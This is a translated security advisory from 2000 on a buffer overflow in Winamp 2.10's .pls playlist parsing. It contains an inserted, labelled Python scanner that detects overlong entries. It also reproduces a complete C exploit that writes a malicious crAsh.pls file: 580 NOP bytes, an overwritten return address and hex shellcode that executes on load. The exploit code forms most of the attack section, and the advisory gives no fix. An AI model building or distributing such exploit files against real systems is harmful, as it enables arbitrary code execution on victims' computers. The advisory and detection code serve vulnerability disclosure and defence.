
Security Research

Security Vulnerability
Winamp 2.10 Buffer Overflow Vulnerability

Published: 2000-01-07
Updated: 2000-01-07

Affected systems:
Nullsoft Winamp 2.10
+Windows 95/98/NT
Description:
A buffer overflow can occur when Winamp 2.10 processes .pls files. The overflow is triggered when a .pls file (which normally lists the mp3 files to play) contains an entry longer than 580 bytes.

An attacker can execute arbitrary commands by constructing a .pls file of the following shape:

[playlist]
File1=<580 bytes><eip><shell code>
NumberOfEntries=1
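The following is an added example and is not part of the original advisory or Steve Fewer's code: a small Python scanner that parses a .pls playlist the way a defender's content filter or mail gateway might, flags any FileN/TitleN/LengthN value longer than the 580-byte limit stated above, and cross-checks NumberOfEntries against the File lines present. The two sample playlists are constructed here; the 580-byte threshold is the one from this advisory.

```python
import re

# Threshold from this advisory: Winamp 2.10 overflows on .pls entries > 580 bytes.
MAX_SAFE_ENTRY = 580
# Per-track keys in a .pls playlist: File1=, Title1=, Length1=, ...
ENTRY_RE = re.compile(rb"^(File|Title|Length)(\d+)=(.*)$")


def scan_pls(data: bytes) -> list:
    """Return findings as (line_number, kind, detail) tuples for a .pls playlist.

    kind is 'no-header', 'overlong', 'bad-count' or 'count-mismatch'. Entry
    values are only measured, never copied into a fixed-size buffer.
    """
    findings = []
    lines = [ln.rstrip(b"\r") for ln in data.splitlines()]
    if not lines or lines[0].strip().lower() != b"[playlist]":
        findings.append((1, "no-header", "first line is not [playlist]"))
    declared, file_entries = None, 0
    for n, line in enumerate(lines, start=1):
        m = ENTRY_RE.match(line)
        if m:
            key, idx, value = m.group(1).decode(), m.group(2).decode(), m.group(3)
            if key == "File":
                file_entries += 1
            if len(value) > MAX_SAFE_ENTRY:
                findings.append((n, "overlong",
                                 f"{key}{idx} is {len(value)} bytes (> {MAX_SAFE_ENTRY})"))
        elif line.startswith(b"NumberOfEntries="):
            try:
                declared = int(line.split(b"=", 1)[1])
            except ValueError:
                findings.append((n, "bad-count", "NumberOfEntries is not an integer"))
    if declared is not None and declared != file_entries:
        findings.append((len(lines), "count-mismatch",
                         f"NumberOfEntries={declared} but {file_entries} File lines"))
    return findings


def is_unsafe_for_winamp210(data: bytes) -> bool:
    """True when the playlist would trigger the overflow described in this advisory."""
    return any(kind == "overlong" for _, kind, _ in scan_pls(data))


# Constructed samples (not from the advisory): a normal playlist and one whose
# File1 value exceeds the 580-byte limit, filled with 'A's rather than a payload.
BENIGN = b"[playlist]\r\nFile1=C:\\music\\track.mp3\r\nTitle1=Track\r\nNumberOfEntries=1\r\n"
OVERLONG = b"[playlist]\nFile1=" + b"A" * 600 + b"\nNumberOfEntries=1\n"

if __name__ == "__main__":
    for name, sample in (("benign", BENIGN), ("overlong", OVERLONG)):
        print(name, is_unsafe_for_winamp210(sample), scan_pls(sample))
```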


<* Source:       Steve Fewer, darkplan@oceanfree.net
   Related link: http://indigo.ie/~lmf
*>


Test method:

Warning

The following program (method) may be offensive in nature and is provided for security research and teaching purposes only. Use at your own risk!

/* Stack based buffer overflow exploit for Winamp v2.10
 * Author Steve Fewer, 04-01-2k. Mail me at darkplan@oceanfree.net
 *
 * For a detailed description on the exploit see my advisory.
 *
 * Tested with Winamp v2.10 using Windows98 on an Intel
 * PII 400 with 128MB RAM
 *
 * http://indigo.ie/~lmf
 */

#include <stdio.h>

int main(void)
{
    char buffer[640];                  /* 580 bytes of padding before the saved return address */
    char eip[8] = "\xF7\xCF\xB9\xBF";  /* value written over the saved EIP (4 bytes, rest zero) */
    /* payload from the advisory; adjacent string literals are concatenated by the compiler */
    char sploit[256] =
        "\x55\x8B\xEC\x33\xC0\x50\x50\x50\xC6\x45\xF4\x4D\xC6\x45\xF5\x53"
        "\xC6\x45\xF6\x56\xC6\x45\xF7\x43\xC6\x45\xF8\x52\xC6\x45\xF9\x54\xC6\x45\xFA\x2E\xC6"
        "\x45\xFB\x44\xC6\x45\xFC\x4C\xC6\x45\xFD\x4C\xBA\xD4\x76\xF7\xbF\x52\x8D\x45\xF4\x50"
        "\xFF\x55\xF0\x55\x8B\xEC\x33\xFF\x57\xC6\x45\xFC\x48\xC6\x45\xFD\x69\xC6\x45\xFE\x21"
        "\xBA\x2E\x41\xF5\xBF\x52\x57\x8D\x55\xFC\x52\x52\x57\xFF\x55\xF8\x55\x8B\xEC\xBA\xFF"
        "\xFF\xFF\xFF\x81\xEA\xFB\xAA\xFF\x87\x52\x33\xC0\x50\xFF\x55\xFC";
    FILE *file;
    int x;

    printf("\n\n\t\t.......................................\n");
    printf("\t\t......Nullsoft Winamp 2.10 exploit.....\n");
    printf("\t\t.......................................\n");
    printf("\t\t.....Author: Steve Fewer, 04-01-2k.....\n");
    printf("\t\t.........http://indigo.ie/~lmf.........\n");
    printf("\t\t.......................................\n\n");

    /* fill the padding with NOPs (0x90) and terminate it so "%s" stops at 580 bytes */
    for (x = 0; x < 580; x++)
        buffer[x] = 0x90;
    buffer[580] = '\0';

    file = fopen("crAsh.pls", "wb");
    if (file == NULL) {
        perror("fopen");
        return 1;
    }

    /* layout: File1=<580 bytes><eip><shell code>, as described in the advisory */
    fprintf(file, "[playlist]\n");
    fprintf(file, "File1=");
    fprintf(file, "%s", buffer);
    fprintf(file, "%s", eip);
    fprintf(file, "%s", sploit);
    fprintf(file, "\nNumberOfEntries=1");

    fclose(file);
    printf("\t created file crAsh.pls loaded with the exploit.\n");
    return 0;
}



Recommendation:
None at present

This vulnerability notice was translated and compiled by NSFOCUS (绿盟科技). All rights reserved; reproduction without permission is prohibited.